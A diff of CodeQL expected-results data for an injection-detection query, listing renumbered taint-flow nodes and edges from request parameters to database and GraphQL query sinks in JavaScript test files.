graphql.js:33:18:33:28 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:33:25:33:26 | id | semmle.label | id | -| graphql.js:39:11:39:28 | id | semmle.label | id | -| graphql.js:39:16:39:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:44:14:44:24 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:44:21:44:22 | id | semmle.label | id | -| graphql.js:48:44:48:54 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:48:51:48:52 | id | semmle.label | id | -| graphql.js:55:11:55:28 | id | semmle.label | id | -| graphql.js:55:16:55:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:56:39:56:49 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:56:46:56:47 | id | semmle.label | id | -| graphql.js:58:66:58:76 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:58:73:58:74 | id | semmle.label | id | -| graphql.js:74:9:74:25 | id | semmle.label | id | -| graphql.js:74:14:74:25 | req.query.id | semmle.label | req.query.id | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | -| graphql.js:75:56:75:57 | id | semmle.label | id | -| graphql.js:84:14:90:8 | `{\\n ... }` | semmle.label | `{\\n ... }` | -| graphql.js:88:13:88:14 | id | semmle.label | id | -| graphql.js:119:11:119:28 | id | semmle.label | id | -| graphql.js:119:16:119:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:120:38:120:48 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:120:45:120:46 | id | semmle.label | id | +| graphql.js:9:34:19:5 | ` // $ ... }\\n ` | semmle.label | ` // $ ... }\\n ` | +| graphql.js:11:46:11:47 | id | semmle.label | id | +| graphql.js:25:11:25:28 | id | semmle.label | id | +| graphql.js:25:16:25:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:26:30:26:40 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:26:37:26:38 | id | semmle.label | id | +| graphql.js:29:32:29:42 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:29:39:29:40 | id | semmle.label | id | +| graphql.js:32:18:32:28 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:32:25:32:26 | id | semmle.label | id | +| graphql.js:38:11:38:28 | id | semmle.label | id | +| graphql.js:38:16:38:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:43:14:43:24 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:43:21:43:22 | id | semmle.label | id | +| graphql.js:47:44:47:54 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:47:51:47:52 | id | semmle.label | id | +| graphql.js:54:11:54:28 | id | semmle.label | id | +| graphql.js:54:16:54:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:55:39:55:49 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:55:46:55:47 | id | semmle.label | id | +| graphql.js:57:66:57:76 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:57:73:57:74 | id | semmle.label | id | +| graphql.js:73:9:73:25 | id | semmle.label | id | +| graphql.js:73:14:73:25 | req.query.id | semmle.label | req.query.id | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | +| graphql.js:74:56:74:57 | id | semmle.label | id | +| graphql.js:82:14:88:8 | `{ // $ ... }` | semmle.label | `{ // $ ... }` | +| graphql.js:86:13:86:14 | id | semmle.label | id | +| graphql.js:117:11:117:28 | id | semmle.label | id | +| graphql.js:117:16:117:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:118:38:118:48 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:118:45:118:46 | id | semmle.label | id | | html-sanitizer.js:13:39:13:44 | param1 | semmle.label | param1 | | html-sanitizer.js:14:5:14:24 | param1 | semmle.label | param1 | | html-sanitizer.js:14:14:14:24 | xss(param1) | semmle.label | xss(param1) | @@ -84,125 +84,125 @@ nodes | marsdb-flow-to.js:10:17:10:18 | {} | semmle.label | {} | | marsdb-flow-to.js:11:17:11:24 | req.body | semmle.label | req.body | | marsdb-flow-to.js:11:17:11:30 | req.body.title | semmle.label | req.body.title | -| marsdb-flow-to.js:14:17:14:21 | query | semmle.label | query | +| marsdb-flow-to.js:13:17:13:21 | query | semmle.label | query | | marsdb.js:12:9:12:18 | query | semmle.label | query | | marsdb.js:12:17:12:18 | {} | semmle.label | {} | | marsdb.js:13:17:13:24 | req.body | semmle.label | req.body | | marsdb.js:13:17:13:30 | req.body.title | semmle.label | req.body.title | -| marsdb.js:16:12:16:16 | query | semmle.label | query | +| marsdb.js:15:12:15:16 | query | semmle.label | query | | minimongo.js:14:9:14:18 | query | semmle.label | query | | minimongo.js:14:17:14:18 | {} | semmle.label | {} | | minimongo.js:15:17:15:24 | req.body | semmle.label | req.body | | minimongo.js:15:17:15:30 | req.body.title | semmle.label | req.body.title | -| minimongo.js:18:12:18:16 | query | semmle.label | query | +| minimongo.js:17:12:17:16 | query | semmle.label | query | | mongodb.js:12:11:12:20 | query | semmle.label | query | | mongodb.js:12:19:12:20 | {} | semmle.label | {} | | mongodb.js:13:5:13:9 | query | semmle.label | query | | mongodb.js:13:19:13:26 | req.body | semmle.label | req.body | | mongodb.js:13:19:13:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:18:16:18:20 | query | semmle.label | query | -| mongodb.js:26:11:26:32 | title | semmle.label | title | -| mongodb.js:26:19:26:26 | req.body | semmle.label | req.body | -| mongodb.js:26:19:26:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:32:18:32:45 | { title ... itle) } | semmle.label | { title ... itle) } | -| mongodb.js:32:27:32:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | -| mongodb.js:32:38:32:42 | title | semmle.label | title | -| mongodb.js:48:11:48:20 | query | semmle.label | query | -| mongodb.js:48:19:48:20 | {} | semmle.label | {} | -| mongodb.js:49:5:49:9 | query | semmle.label | query | -| mongodb.js:49:19:49:33 | req.query.title | semmle.label | req.query.title | -| mongodb.js:54:16:54:20 | query | semmle.label | query | -| mongodb.js:59:8:59:17 | query | semmle.label | query | -| mongodb.js:59:16:59:17 | {} | semmle.label | {} | -| mongodb.js:60:2:60:6 | query | semmle.label | query | -| mongodb.js:60:16:60:30 | req.query.title | semmle.label | req.query.title | -| mongodb.js:65:12:65:16 | query | semmle.label | query | -| mongodb.js:70:7:70:25 | tag | semmle.label | tag | -| mongodb.js:70:13:70:25 | req.query.tag | semmle.label | req.query.tag | -| mongodb.js:77:14:77:26 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:77:22:77:24 | tag | semmle.label | tag | -| mongodb.js:85:12:85:24 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:85:20:85:22 | tag | semmle.label | tag | -| mongodb.js:106:9:106:18 | query | semmle.label | query | -| mongodb.js:106:17:106:18 | {} | semmle.label | {} | -| mongodb.js:107:3:107:7 | query | semmle.label | query | -| mongodb.js:107:17:107:29 | queries.title | semmle.label | queries.title | -| mongodb.js:112:14:112:18 | query | semmle.label | query | +| mongodb.js:17:16:17:20 | query | semmle.label | query | +| mongodb.js:25:11:25:32 | title | semmle.label | title | +| mongodb.js:25:19:25:26 | req.body | semmle.label | req.body | +| mongodb.js:25:19:25:32 | req.body.title | semmle.label | req.body.title | +| mongodb.js:30:18:30:45 | { title ... itle) } | semmle.label | { title ... itle) } | +| mongodb.js:30:27:30:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | +| mongodb.js:30:38:30:42 | title | semmle.label | title | +| mongodb.js:46:11:46:20 | query | semmle.label | query | +| mongodb.js:46:19:46:20 | {} | semmle.label | {} | +| mongodb.js:47:5:47:9 | query | semmle.label | query | +| mongodb.js:47:19:47:33 | req.query.title | semmle.label | req.query.title | +| mongodb.js:51:16:51:20 | query | semmle.label | query | +| mongodb.js:56:8:56:17 | query | semmle.label | query | +| mongodb.js:56:16:56:17 | {} | semmle.label | {} | +| mongodb.js:57:2:57:6 | query | semmle.label | query | +| mongodb.js:57:16:57:30 | req.query.title | semmle.label | req.query.title | +| mongodb.js:61:12:61:16 | query | semmle.label | query | +| mongodb.js:66:7:66:25 | tag | semmle.label | tag | +| mongodb.js:66:13:66:25 | req.query.tag | semmle.label | req.query.tag | +| mongodb.js:72:14:72:26 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:72:22:72:24 | tag | semmle.label | tag | +| mongodb.js:79:12:79:24 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:79:20:79:22 | tag | semmle.label | tag | +| mongodb.js:100:9:100:18 | query | semmle.label | query | +| mongodb.js:100:17:100:18 | {} | semmle.label | {} | +| mongodb.js:101:3:101:7 | query | semmle.label | query | +| mongodb.js:101:17:101:29 | queries.title | semmle.label | queries.title | +| mongodb.js:105:14:105:18 | query | semmle.label | query | | mongodb_bodySafe.js:23:11:23:20 | query | semmle.label | query | | mongodb_bodySafe.js:23:19:23:20 | {} | semmle.label | {} | | mongodb_bodySafe.js:24:5:24:9 | query | semmle.label | query | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | semmle.label | req.query.title | -| mongodb_bodySafe.js:29:16:29:20 | query | semmle.label | query | +| mongodb_bodySafe.js:28:16:28:20 | query | semmle.label | query | | mongoose.js:20:8:20:17 | query | semmle.label | query | | mongoose.js:20:16:20:17 | {} | semmle.label | {} | | mongoose.js:21:2:21:6 | query | semmle.label | query | | mongoose.js:21:16:21:23 | req.body | semmle.label | req.body | | mongoose.js:21:16:21:29 | req.body.title | semmle.label | req.body.title | -| mongoose.js:24:21:24:27 | [query] | semmle.label | [query] | -| mongoose.js:24:22:24:26 | query | semmle.label | query | -| mongoose.js:27:17:27:21 | query | semmle.label | query | -| mongoose.js:30:22:30:26 | query | semmle.label | query | -| mongoose.js:33:21:33:25 | query | semmle.label | query | -| mongoose.js:36:28:36:32 | query | semmle.label | query | -| mongoose.js:39:16:39:20 | query | semmle.label | query | -| mongoose.js:42:19:42:23 | query | semmle.label | query | -| mongoose.js:45:28:45:32 | query | semmle.label | query | -| mongoose.js:48:28:48:32 | query | semmle.label | query | -| mongoose.js:51:28:51:32 | query | semmle.label | query | -| mongoose.js:54:22:54:26 | query | semmle.label | query | -| mongoose.js:57:18:57:22 | query | semmle.label | query | -| mongoose.js:60:22:60:26 | query | semmle.label | query | -| mongoose.js:63:21:63:25 | query | semmle.label | query | -| mongoose.js:65:32:65:36 | query | semmle.label | query | -| mongoose.js:67:27:67:31 | query | semmle.label | query | -| mongoose.js:68:8:68:12 | query | semmle.label | query | -| mongoose.js:71:17:71:21 | query | semmle.label | query | -| mongoose.js:72:10:72:14 | query | semmle.label | query | -| mongoose.js:73:8:73:12 | query | semmle.label | query | -| mongoose.js:74:7:74:11 | query | semmle.label | query | -| mongoose.js:75:16:75:20 | query | semmle.label | query | -| mongoose.js:76:12:76:16 | query | semmle.label | query | -| mongoose.js:77:10:77:14 | query | semmle.label | query | -| mongoose.js:81:37:81:41 | query | semmle.label | query | +| mongoose.js:23:21:23:27 | [query] | semmle.label | [query] | +| mongoose.js:23:22:23:26 | query | semmle.label | query | +| mongoose.js:25:17:25:21 | query | semmle.label | query | +| mongoose.js:27:22:27:26 | query | semmle.label | query | +| mongoose.js:29:21:29:25 | query | semmle.label | query | +| mongoose.js:31:28:31:32 | query | semmle.label | query | +| mongoose.js:33:16:33:20 | query | semmle.label | query | +| mongoose.js:35:19:35:23 | query | semmle.label | query | +| mongoose.js:37:28:37:32 | query | semmle.label | query | +| mongoose.js:39:28:39:32 | query | semmle.label | query | +| mongoose.js:41:28:41:32 | query | semmle.label | query | +| mongoose.js:43:22:43:26 | query | semmle.label | query | +| mongoose.js:45:18:45:22 | query | semmle.label | query | +| mongoose.js:47:22:47:26 | query | semmle.label | query | +| mongoose.js:49:21:49:25 | query | semmle.label | query | +| mongoose.js:51:32:51:36 | query | semmle.label | query | +| mongoose.js:53:27:53:31 | query | semmle.label | query | +| mongoose.js:54:8:54:12 | query | semmle.label | query | +| mongoose.js:57:17:57:21 | query | semmle.label | query | +| mongoose.js:58:10:58:14 | query | semmle.label | query | +| mongoose.js:59:8:59:12 | query | semmle.label | query | +| mongoose.js:60:7:60:11 | query | semmle.label | query | +| mongoose.js:61:16:61:20 | query | semmle.label | query | +| mongoose.js:62:12:62:16 | query | semmle.label | query | +| mongoose.js:63:10:63:14 | query | semmle.label | query | +| mongoose.js:67:37:67:41 | query | semmle.label | query | +| mongoose.js:68:46:68:50 | query | semmle.label | query | +| mongoose.js:69:47:69:51 | query | semmle.label | query | +| mongoose.js:71:46:71:50 | query | semmle.label | query | +| mongoose.js:73:51:73:55 | query | semmle.label | query | +| mongoose.js:75:46:75:50 | query | semmle.label | query | +| mongoose.js:78:46:78:50 | query | semmle.label | query | +| mongoose.js:80:51:80:55 | query | semmle.label | query | | mongoose.js:82:46:82:50 | query | semmle.label | query | -| mongoose.js:83:47:83:51 | query | semmle.label | query | -| mongoose.js:85:46:85:50 | query | semmle.label | query | -| mongoose.js:87:51:87:55 | query | semmle.label | query | -| mongoose.js:89:46:89:50 | query | semmle.label | query | -| mongoose.js:92:46:92:50 | query | semmle.label | query | -| mongoose.js:94:51:94:55 | query | semmle.label | query | -| mongoose.js:96:46:96:50 | query | semmle.label | query | -| mongoose.js:104:21:104:25 | query | semmle.label | query | -| mongoose.js:111:14:111:18 | query | semmle.label | query | -| mongoose.js:113:31:113:35 | query | semmle.label | query | -| mongoose.js:115:6:115:22 | id | semmle.label | id | -| mongoose.js:115:11:115:22 | req.query.id | semmle.label | req.query.id | -| mongoose.js:115:25:115:45 | cond | semmle.label | cond | -| mongoose.js:115:32:115:45 | req.query.cond | semmle.label | req.query.cond | -| mongoose.js:116:22:116:25 | cond | semmle.label | cond | -| mongoose.js:117:21:117:24 | cond | semmle.label | cond | -| mongoose.js:118:21:118:24 | cond | semmle.label | cond | -| mongoose.js:119:18:119:21 | cond | semmle.label | cond | -| mongoose.js:120:22:120:25 | cond | semmle.label | cond | -| mongoose.js:121:16:121:19 | cond | semmle.label | cond | -| mongoose.js:122:19:122:22 | cond | semmle.label | cond | -| mongoose.js:123:20:123:21 | id | semmle.label | id | -| mongoose.js:124:28:124:31 | cond | semmle.label | cond | -| mongoose.js:125:28:125:31 | cond | semmle.label | cond | -| mongoose.js:126:28:126:31 | cond | semmle.label | cond | -| mongoose.js:127:18:127:21 | cond | semmle.label | cond | -| mongoose.js:128:22:128:25 | cond | semmle.label | cond | -| mongoose.js:129:21:129:24 | cond | semmle.label | cond | -| mongoose.js:130:16:130:26 | { _id: id } | semmle.label | { _id: id } | -| mongoose.js:130:23:130:24 | id | semmle.label | id | -| mongoose.js:133:38:133:42 | query | semmle.label | query | -| mongoose.js:136:30:136:34 | query | semmle.label | query | +| mongoose.js:90:21:90:25 | query | semmle.label | query | +| mongoose.js:97:14:97:18 | query | semmle.label | query | +| mongoose.js:99:31:99:35 | query | semmle.label | query | +| mongoose.js:101:6:101:22 | id | semmle.label | id | +| mongoose.js:101:11:101:22 | req.query.id | semmle.label | req.query.id | +| mongoose.js:101:25:101:45 | cond | semmle.label | cond | +| mongoose.js:101:32:101:45 | req.query.cond | semmle.label | req.query.cond | +| mongoose.js:102:22:102:25 | cond | semmle.label | cond | +| mongoose.js:103:21:103:24 | cond | semmle.label | cond | +| mongoose.js:104:21:104:24 | cond | semmle.label | cond | +| mongoose.js:105:18:105:21 | cond | semmle.label | cond | +| mongoose.js:106:22:106:25 | cond | semmle.label | cond | +| mongoose.js:107:16:107:19 | cond | semmle.label | cond | +| mongoose.js:108:19:108:22 | cond | semmle.label | cond | +| mongoose.js:109:20:109:21 | id | semmle.label | id | +| mongoose.js:110:28:110:31 | cond | semmle.label | cond | +| mongoose.js:111:28:111:31 | cond | semmle.label | cond | +| mongoose.js:112:28:112:31 | cond | semmle.label | cond | +| mongoose.js:113:18:113:21 | cond | semmle.label | cond | +| mongoose.js:114:22:114:25 | cond | semmle.label | cond | +| mongoose.js:115:21:115:24 | cond | semmle.label | cond | +| mongoose.js:116:16:116:26 | { _id: id } | semmle.label | { _id: id } | +| mongoose.js:116:23:116:24 | id | semmle.label | id | +| mongoose.js:119:38:119:42 | query | semmle.label | query | +| mongoose.js:122:30:122:34 | query | semmle.label | query | | mongooseJsonParse.js:19:11:19:20 | query | semmle.label | query | | mongooseJsonParse.js:19:19:19:20 | {} | semmle.label | {} | | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | semmle.label | JSON.pa ... y.data) | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | semmle.label | JSON.pa ... ).title | | mongooseJsonParse.js:20:30:20:43 | req.query.data | semmle.label | req.query.data | -| mongooseJsonParse.js:23:19:23:23 | query | semmle.label | query | +| mongooseJsonParse.js:22:19:22:23 | query | semmle.label | query | | mongooseModelClient.js:10:7:10:32 | v | semmle.label | v | | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | semmle.label | JSON.pa ... body.x) | | mongooseModelClient.js:10:22:10:29 | req.body | semmle.label | req.body | @@ -268,8 +268,8 @@ nodes | socketio.js:10:25:10:30 | handle | semmle.label | handle | | socketio.js:11:12:11:53 | `INSERT ... andle}` | semmle.label | `INSERT ... andle}` | | socketio.js:11:46:11:51 | handle | semmle.label | handle | -| tst2.js:9:27:9:84 | "select ... d + "'" | semmle.label | "select ... d + "'" | -| tst2.js:9:66:9:78 | req.params.id | semmle.label | req.params.id | +| tst2.js:8:27:8:84 | "select ... d + "'" | semmle.label | "select ... d + "'" | +| tst2.js:8:66:8:78 | req.params.id | semmle.label | req.params.id | | tst3.js:7:7:8:55 | query1 | semmle.label | query1 | | tst3.js:8:16:8:34 | req.params.category | semmle.label | req.params.category | | tst3.js:9:14:9:19 | query1 | semmle.label | query1 | @@ -278,34 +278,34 @@ nodes | tst.js:10:10:10:64 | 'SELECT ... d + '"' | semmle.label | 'SELECT ... d + '"' | | tst.js:10:46:10:58 | req.params.id | semmle.label | req.params.id | edges -| graphql.js:8:11:8:28 | id | graphql.js:12:46:12:47 | id | provenance | | +| graphql.js:8:11:8:28 | id | graphql.js:11:46:11:47 | id | provenance | | | graphql.js:8:16:8:28 | req.params.id | graphql.js:8:11:8:28 | id | provenance | | -| graphql.js:12:46:12:47 | id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:27:37:27:38 | id | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:30:39:30:40 | id | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:33:25:33:26 | id | provenance | | -| graphql.js:26:16:26:28 | req.params.id | graphql.js:26:11:26:28 | id | provenance | | -| graphql.js:27:37:27:38 | id | graphql.js:27:30:27:40 | `foo ${id}` | provenance | | -| graphql.js:30:39:30:40 | id | graphql.js:30:32:30:42 | `foo ${id}` | provenance | | -| graphql.js:33:25:33:26 | id | graphql.js:33:18:33:28 | `foo ${id}` | provenance | | -| graphql.js:39:11:39:28 | id | graphql.js:44:21:44:22 | id | provenance | | -| graphql.js:39:11:39:28 | id | graphql.js:48:51:48:52 | id | provenance | | -| graphql.js:39:16:39:28 | req.params.id | graphql.js:39:11:39:28 | id | provenance | | -| graphql.js:44:21:44:22 | id | graphql.js:44:14:44:24 | `foo ${id}` | provenance | | -| graphql.js:48:51:48:52 | id | graphql.js:48:44:48:54 | `foo ${id}` | provenance | | -| graphql.js:55:11:55:28 | id | graphql.js:56:46:56:47 | id | provenance | | -| graphql.js:55:11:55:28 | id | graphql.js:58:73:58:74 | id | provenance | | -| graphql.js:55:16:55:28 | req.params.id | graphql.js:55:11:55:28 | id | provenance | | -| graphql.js:56:46:56:47 | id | graphql.js:56:39:56:49 | `foo ${id}` | provenance | | -| graphql.js:58:73:58:74 | id | graphql.js:58:66:58:76 | `foo ${id}` | provenance | | -| graphql.js:74:9:74:25 | id | graphql.js:75:56:75:57 | id | provenance | | -| graphql.js:74:9:74:25 | id | graphql.js:88:13:88:14 | id | provenance | | -| graphql.js:74:14:74:25 | req.query.id | graphql.js:74:9:74:25 | id | provenance | | -| graphql.js:75:56:75:57 | id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | provenance | | -| graphql.js:88:13:88:14 | id | graphql.js:84:14:90:8 | `{\\n ... }` | provenance | | -| graphql.js:119:11:119:28 | id | graphql.js:120:45:120:46 | id | provenance | | -| graphql.js:119:16:119:28 | req.params.id | graphql.js:119:11:119:28 | id | provenance | | -| graphql.js:120:45:120:46 | id | graphql.js:120:38:120:48 | `foo ${id}` | provenance | | +| graphql.js:11:46:11:47 | id | graphql.js:9:34:19:5 | ` // $ ... }\\n ` | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:26:37:26:38 | id | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:29:39:29:40 | id | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:32:25:32:26 | id | provenance | | +| graphql.js:25:16:25:28 | req.params.id | graphql.js:25:11:25:28 | id | provenance | | +| graphql.js:26:37:26:38 | id | graphql.js:26:30:26:40 | `foo ${id}` | provenance | | +| graphql.js:29:39:29:40 | id | graphql.js:29:32:29:42 | `foo ${id}` | provenance | | +| graphql.js:32:25:32:26 | id | graphql.js:32:18:32:28 | `foo ${id}` | provenance | | +| graphql.js:38:11:38:28 | id | graphql.js:43:21:43:22 | id | provenance | | +| graphql.js:38:11:38:28 | id | graphql.js:47:51:47:52 | id | provenance | | +| graphql.js:38:16:38:28 | req.params.id | graphql.js:38:11:38:28 | id | provenance | | +| graphql.js:43:21:43:22 | id | graphql.js:43:14:43:24 | `foo ${id}` | provenance | | +| graphql.js:47:51:47:52 | id | graphql.js:47:44:47:54 | `foo ${id}` | provenance | | +| graphql.js:54:11:54:28 | id | graphql.js:55:46:55:47 | id | provenance | | +| graphql.js:54:11:54:28 | id | graphql.js:57:73:57:74 | id | provenance | | +| graphql.js:54:16:54:28 | req.params.id | graphql.js:54:11:54:28 | id | provenance | | +| graphql.js:55:46:55:47 | id | graphql.js:55:39:55:49 | `foo ${id}` | provenance | | +| graphql.js:57:73:57:74 | id | graphql.js:57:66:57:76 | `foo ${id}` | provenance | | +| graphql.js:73:9:73:25 | id | graphql.js:74:56:74:57 | id | provenance | | +| graphql.js:73:9:73:25 | id | graphql.js:86:13:86:14 | id | provenance | | +| graphql.js:73:14:73:25 | req.query.id | graphql.js:73:9:73:25 | id | provenance | | +| graphql.js:74:56:74:57 | id | graphql.js:74:46:74:64 | "{ foo" + id + " }" | provenance | | +| graphql.js:86:13:86:14 | id | graphql.js:82:14:88:8 | `{ // $ ... }` | provenance | | +| graphql.js:117:11:117:28 | id | graphql.js:118:45:118:46 | id | provenance | | +| graphql.js:117:16:117:28 | req.params.id | graphql.js:117:11:117:28 | id | provenance | | +| graphql.js:118:45:118:46 | id | graphql.js:118:38:118:48 | `foo ${id}` | provenance | | | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:14:18:14:23 | param1 | provenance | | | html-sanitizer.js:14:5:14:24 | param1 | html-sanitizer.js:16:54:16:59 | param1 | provenance | | | html-sanitizer.js:14:14:14:24 | xss(param1) | html-sanitizer.js:14:5:14:24 | param1 | provenance | | @@ -351,209 +351,209 @@ edges | ldap.js:64:38:64:45 | username | ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | provenance | | | ldap.js:66:40:66:51 | parsedFilter | ldap.js:66:30:66:53 | { filte ... ilter } | provenance | Config | | ldap.js:68:33:68:40 | username | ldap.js:68:27:68:42 | `cn=${username}` | provenance | | -| marsdb-flow-to.js:10:9:10:18 | query | marsdb-flow-to.js:14:17:14:21 | query | provenance | | +| marsdb-flow-to.js:10:9:10:18 | query | marsdb-flow-to.js:13:17:13:21 | query | provenance | | | marsdb-flow-to.js:10:17:10:18 | {} | marsdb-flow-to.js:10:9:10:18 | query | provenance | | | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:11:17:11:30 | req.body.title | provenance | Config | | marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:9:10:18 | query | provenance | Config | | marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:17:10:18 | {} | provenance | Config | -| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:14:17:14:21 | query | provenance | Config | -| marsdb.js:12:9:12:18 | query | marsdb.js:16:12:16:16 | query | provenance | | +| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:13:17:13:21 | query | provenance | Config | +| marsdb.js:12:9:12:18 | query | marsdb.js:15:12:15:16 | query | provenance | | | marsdb.js:12:17:12:18 | {} | marsdb.js:12:9:12:18 | query | provenance | | | marsdb.js:13:17:13:24 | req.body | marsdb.js:13:17:13:30 | req.body.title | provenance | Config | | marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:9:12:18 | query | provenance | Config | | marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:17:12:18 | {} | provenance | Config | -| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:16:12:16:16 | query | provenance | Config | -| minimongo.js:14:9:14:18 | query | minimongo.js:18:12:18:16 | query | provenance | | +| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:15:12:15:16 | query | provenance | Config | +| minimongo.js:14:9:14:18 | query | minimongo.js:17:12:17:16 | query | provenance | | | minimongo.js:14:17:14:18 | {} | minimongo.js:14:9:14:18 | query | provenance | | | minimongo.js:15:17:15:24 | req.body | minimongo.js:15:17:15:30 | req.body.title | provenance | Config | | minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:9:14:18 | query | provenance | Config | | minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:17:14:18 | {} | provenance | Config | -| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:18:12:18:16 | query | provenance | Config | +| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:17:12:17:16 | query | provenance | Config | | mongodb.js:12:11:12:20 | query | mongodb.js:13:5:13:9 | query | provenance | | | mongodb.js:12:19:12:20 | {} | mongodb.js:12:11:12:20 | query | provenance | | -| mongodb.js:13:5:13:9 | query | mongodb.js:18:16:18:20 | query | provenance | | +| mongodb.js:13:5:13:9 | query | mongodb.js:17:16:17:20 | query | provenance | | | mongodb.js:13:19:13:26 | req.body | mongodb.js:13:19:13:32 | req.body.title | provenance | Config | | mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:11:12:20 | query | provenance | Config | | mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:19:12:20 | {} | provenance | Config | | mongodb.js:13:19:13:32 | req.body.title | mongodb.js:13:5:13:9 | query | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:18:16:18:20 | query | provenance | Config | -| mongodb.js:26:11:26:32 | title | mongodb.js:32:38:32:42 | title | provenance | | -| mongodb.js:26:19:26:26 | req.body | mongodb.js:26:19:26:32 | req.body.title | provenance | Config | -| mongodb.js:26:19:26:32 | req.body.title | mongodb.js:26:11:26:32 | title | provenance | | -| mongodb.js:32:27:32:43 | JSON.parse(title) | mongodb.js:32:18:32:45 | { title ... itle) } | provenance | Config | -| mongodb.js:32:38:32:42 | title | mongodb.js:32:27:32:43 | JSON.parse(title) | provenance | Config | -| mongodb.js:48:11:48:20 | query | mongodb.js:49:5:49:9 | query | provenance | | -| mongodb.js:48:19:48:20 | {} | mongodb.js:48:11:48:20 | query | provenance | | -| mongodb.js:49:5:49:9 | query | mongodb.js:54:16:54:20 | query | provenance | | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:48:11:48:20 | query | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:48:19:48:20 | {} | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:49:5:49:9 | query | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | provenance | Config | -| mongodb.js:59:8:59:17 | query | mongodb.js:60:2:60:6 | query | provenance | | -| mongodb.js:59:16:59:17 | {} | mongodb.js:59:8:59:17 | query | provenance | | -| mongodb.js:60:2:60:6 | query | mongodb.js:65:12:65:16 | query | provenance | | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:59:8:59:17 | query | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:59:16:59:17 | {} | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:60:2:60:6 | query | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:65:12:65:16 | query | provenance | Config | -| mongodb.js:70:7:70:25 | tag | mongodb.js:77:22:77:24 | tag | provenance | | -| mongodb.js:70:7:70:25 | tag | mongodb.js:85:20:85:22 | tag | provenance | | -| mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:70:7:70:25 | tag | provenance | | -| mongodb.js:77:22:77:24 | tag | mongodb.js:77:14:77:26 | { tags: tag } | provenance | Config | -| mongodb.js:85:20:85:22 | tag | mongodb.js:85:12:85:24 | { tags: tag } | provenance | Config | -| mongodb.js:106:9:106:18 | query | mongodb.js:107:3:107:7 | query | provenance | | -| mongodb.js:106:17:106:18 | {} | mongodb.js:106:9:106:18 | query | provenance | | -| mongodb.js:107:3:107:7 | query | mongodb.js:112:14:112:18 | query | provenance | | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:106:9:106:18 | query | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:106:17:106:18 | {} | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:107:3:107:7 | query | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:112:14:112:18 | query | provenance | Config | +| 